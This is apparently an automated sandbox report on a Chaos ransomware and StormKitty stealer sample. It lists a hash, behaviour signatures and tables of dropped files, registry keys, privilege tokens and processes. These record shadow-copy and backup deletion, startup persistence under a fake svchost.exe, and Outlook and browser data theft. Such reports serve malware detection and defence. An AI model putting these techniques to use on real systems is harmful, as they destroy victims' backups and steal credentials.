Malware Analysis Report

2025-04-13 21:19

Sample ID 250322-glcccayxds
Target ZGZ3X_nig.exe
SHA256 568d485f89554f0a315d1f839e5e2b33c7735f9b3dc3892391bdaa16a3f480e8
Tags
chaos stormkitty collection defense_evasion discovery evasion execution impact persistence privilege_escalation ransomware spyware stealer upx
score
10/10

Analysis Overview

score
10/10

SHA256

568d485f89554f0a315d1f839e5e2b33c7735f9b3dc3892391bdaa16a3f480e8

Threat Level: Known bad

The file ZGZ3X_nig.exe was found to be: Known bad.

Malicious Activity Summary

Stormkitty family

Chaos Ransomware

Chaos

StormKitty payload

StormKitty

Chaos family

Modifies boot configuration data using bcdedit

Deletes shadow copies

Blocklisted process makes network request

Deletes backup catalog

Downloads MZ/PE file

Disables Task Manager via registry modification

Checks computer location settings

Drops startup file

Executes dropped EXE

Reads user/profile data of web browsers

Drops desktop.ini file(s)

Looks up external IP address via web service

Accesses Microsoft Outlook profiles

Command and Scripting Interpreter: PowerShell

UPX packed file

Sets desktop wallpaper using registry

Hide Artifacts: Ignore Process Interrupts

Unsigned PE

Program crash

Browser Information Discovery

Enumerates physical storage devices

System Network Configuration Discovery: Wi-Fi Discovery

Event Triggered Execution: Netsh Helper DLL

System Location Discovery: System Language Discovery

Interacts with shadow copies

Runs net.exe

Checks SCSI registry key(s)

Suspicious behavior: AddClipboardFormatListener

Suspicious use of AdjustPrivilegeToken

Uses Task Scheduler COM API

outlook_office_path

outlook_win_path

Checks processor information in registry

Modifies registry class

Opens file in notepad (likely ransom note)

Uses Volume Shadow Copy service COM API

Suspicious use of WriteProcessMemory

Suspicious behavior: EnumeratesProcesses

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2025-03-22 05:53

Signatures

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral2

Detonation Overview

Submitted

2025-03-22 05:53

Reported

2025-03-22 05:55

Platform

win10v2004-20250314-en

Max time kernel

93s

Max time network

132s

Command Line

"C:\Users\Admin\AppData\Local\Temp\ZGZ3X_nig.exe"

Signatures

Chaos

ransomware chaos

Chaos Ransomware

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Chaos family

chaos

StormKitty

stealer stormkitty

StormKitty payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Stormkitty family

stormkitty

Deletes shadow copies

ransomware defense_evasion impact execution

Modifies boot configuration data using bcdedit

ransomware evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\bcdedit.exe N/A
N/A N/A C:\Windows\system32\bcdedit.exe N/A

Deletes backup catalog

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\wbadmin.exe N/A

Disables Task Manager via registry modification

defense_evasion

Downloads MZ/PE file

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3218366390-1258052702-4267193707-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\build.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3218366390-1258052702-4267193707-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Roaming\svchost.exe N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\readme.txt C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.url C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\build.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\kernelv.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\svchost.exe N/A

Reads user/profile data of web browsers

spyware stealer

Accesses Microsoft Outlook profiles

collection
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-3218366390-1258052702-4267193707-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\kernelv.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3218366390-1258052702-4267193707-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\kernelv.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3218366390-1258052702-4267193707-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\kernelv.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Drops desktop.ini file(s)

Description Indicator Process Target
File opened for modification C:\Users\Default\AppData\Roaming\Microsoft\Windows\SendTo\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Public\Downloads\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\Burn\Burn2\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\AccountPictures\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Default\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\History\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Public\Libraries\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group2\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Admin\Desktop\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Admin\Favorites\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Admin\OneDrive\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Accessories\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group3\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\SendTo\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Admin\Contacts\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Admin\Documents\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Admin\Links\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\System Tools\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Public\AccountPictures\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\Burn\Burn\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Administrative Tools\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Admin\Saved Games\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Administrative Tools\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group2\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Public\Music\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Public\Pictures\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Admin\Music\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Admin\3D Objects\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Accessibility\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\Application Shortcuts\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\Burn\Burn1\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Libraries\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Admin\Pictures\Camera Roll\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\All Users\Microsoft\Windows\Start Menu\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group1\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group1\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group3\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Admin\Favorites\Links\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Admin\Pictures\Saved Pictures\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Public\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Public\Desktop\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Admin\Pictures\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Admin\Videos\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\Desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Admin\Downloads\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\Desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Public\Documents\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Public\Videos\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\StartUp\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification F:\$RECYCLE.BIN\S-1-5-21-3218366390-1258052702-4267193707-1000\desktop.ini C:\Users\Admin\AppData\Roaming\svchost.exe N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A

Sets desktop wallpaper using registry

ransomware
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3218366390-1258052702-4267193707-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\2ygajis2g.jpg" C:\Users\Admin\AppData\Roaming\svchost.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Hide Artifacts: Ignore Process Interrupts

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Browser Information Discovery

discovery

Enumerates physical storage devices

Event Triggered Execution: Netsh Helper DLL

persistence privilege_escalation
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\kernelv.exe

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\findstr.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\chcp.com N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\chcp.com N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\kernelv.exe N/A

System Network Configuration Discovery: Wi-Fi Discovery

discovery
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A

Checks SCSI registry key(s)

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName C:\Windows\System32\vds.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 C:\Windows\System32\vds.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\FriendlyName C:\Windows\System32\vds.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000 C:\Windows\System32\vds.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0 C:\Users\Admin\AppData\Local\Temp\kernelv.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier C:\Users\Admin\AppData\Local\Temp\kernelv.exe N/A

Interacts with shadow copies

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\vssadmin.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3218366390-1258052702-4267193707-1000_Classes\Local Settings C:\Users\Admin\AppData\Roaming\svchost.exe N/A

Opens file in notepad (likely ransom note)

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\NOTEPAD.EXE N/A

Runs net.exe

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\svchost.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\build.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\build.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\build.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\kernelv.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\kernelv.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\kernelv.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\kernelv.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\build.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\build.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\build.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\build.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\build.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\build.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\build.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\build.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\build.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\build.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\build.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\build.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\build.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\build.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\build.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\build.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\build.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\build.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\build.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\build.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\build.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\build.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\build.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\build.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\svchost.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\build.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\kernelv.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\svchost.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\wbengine.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\wbengine.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\wbengine.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1868 wrote to memory of 1420 N/A C:\Users\Admin\AppData\Local\Temp\ZGZ3X_nig.exe C:\Windows\system32\cmd.exe
PID 1868 wrote to memory of 1420 N/A C:\Users\Admin\AppData\Local\Temp\ZGZ3X_nig.exe C:\Windows\system32\cmd.exe
PID 1420 wrote to memory of 2348 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 1420 wrote to memory of 2348 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 2348 wrote to memory of 1872 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 2348 wrote to memory of 1872 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1420 wrote to memory of 2576 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1420 wrote to memory of 2576 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
